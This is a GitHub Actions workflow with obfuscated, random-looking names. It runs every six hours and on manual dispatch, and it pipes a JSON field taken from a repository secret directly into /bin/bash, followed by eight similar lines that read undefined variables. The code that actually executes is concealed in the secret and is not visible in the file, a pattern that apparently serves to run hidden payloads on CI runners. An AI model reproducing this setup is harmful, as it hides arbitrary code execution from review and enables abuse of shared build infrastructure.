name: caidafu2345

on:
  workflow_dispatch:
  schedule:
    - cron: '16 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caidafu2345
        env:
          x21: ${{ secrets.x21 }}
        run: |
          echo $x21 | jq -r .gzib951 | /bin/bash
          echo $thads6 | jq -r .urqox8454 | /bin/bash
          echo $rsypo12477 | jq -r .qbia7 | /bin/bash
          echo $qmgi22632 | jq -r .dv3467 | /bin/bash
          echo $yifg372 | jq -r .cepit82156 | /bin/bash
          echo $xkvrg4090 | jq -r .oz7655 | /bin/bash
          echo $vide317 | jq -r .bt36713 | /bin/bash
          echo $zsmps1 | jq -r .spzuj80672 | /bin/bash
          echo $w2 | jq -r .ypb15520 | /bin/bash

